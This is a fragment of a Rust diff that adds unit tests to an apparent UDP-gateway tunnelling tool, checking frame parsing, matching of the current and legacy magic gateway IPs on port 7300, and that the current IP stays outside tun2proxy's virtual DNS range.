+        let f1 = serialise_frame(&Frame { flags: FLAG_KEEPALIVE, conn_id: 1, addr: None, payload: vec![] });
+        let f2 = serialise_frame(&Frame { flags: FLAG_KEEPALIVE, conn_id: 2, addr: None, payload: vec![] });
+        let mut buf = f1.clone();
+        buf.extend_from_slice(&f2);
+
+        let (p1, c1) = try_parse_frame(&buf).unwrap().unwrap();
+        assert_eq!(p1.conn_id, 1);
+        let (p2, _) = try_parse_frame(&buf[c1..]).unwrap().unwrap();
+        assert_eq!(p2.conn_id, 2);
+    }
+
+    #[test]
+    fn is_udpgw_dest_works() {
+        // Current magic IP — must be recognised.
+        assert!(is_udpgw_dest("192.0.2.1", 7300));
+        // Legacy pre-#251 magic IP — still recognised for one deprecation
+        // cycle so old Android clients keep working against a new tunnel-node.
+        // Remove this assertion (and `LEGACY_UDPGW_MAGIC_IP`) in v1.10.0.
+        assert!(is_udpgw_dest("198.18.0.1", 7300));
+        // Wrong port on either IP, or unrelated host on the magic port, must not match.
+        assert!(!is_udpgw_dest("192.0.2.1", 80));
+        assert!(!is_udpgw_dest("198.18.0.1", 80));
+        assert!(!is_udpgw_dest("8.8.8.8", 7300));
+    }
+
+    #[test]
+    fn magic_host_matches_octets() {
+        // The dotted-quad `_HOST` constants are what `is_udpgw_dest` actually
+        // compares against — but the `_IP` octet arrays are what tests and
+        // future humans reason about. If they drift, `is_udpgw_dest` silently
+        // stops matching what the Android client is sending. Pin them here.
+        let dotted = |ip: [u8; 4]| format!("{}.{}.{}.{}", ip[0], ip[1], ip[2], ip[3]);
+        assert_eq!(dotted(UDPGW_MAGIC_IP), UDPGW_MAGIC_HOST);
+        assert_eq!(dotted(LEGACY_UDPGW_MAGIC_IP), LEGACY_UDPGW_MAGIC_HOST);
+    }
+
+    #[test]
+    fn magic_ip_outside_virtual_dns_range() {
+        // tun2proxy's `--dns virtual` allocator synthesises fake IPs inside
+        // 198.18.0.0/15 (covers 198.18.0.0 – 198.19.255.255). The *current*
+        // magic IP MUST stay outside that range — see #251. The legacy IP
+        // is intentionally still in the bad range (that was the bug); it
+        // is exempt and will be removed in v1.10.0.
+        let [a, b, _, _] = UDPGW_MAGIC_IP;
+        assert!(
+            !(a == 198 && (b == 18 || b == 19)),
+            "UDPGW_MAGIC_IP {:?} is inside 198.18.0.0/15 — will collide with tun2proxy --dns virtual (see #251)",
+            UDPGW_MAGIC_IP
+        );
+    }
+}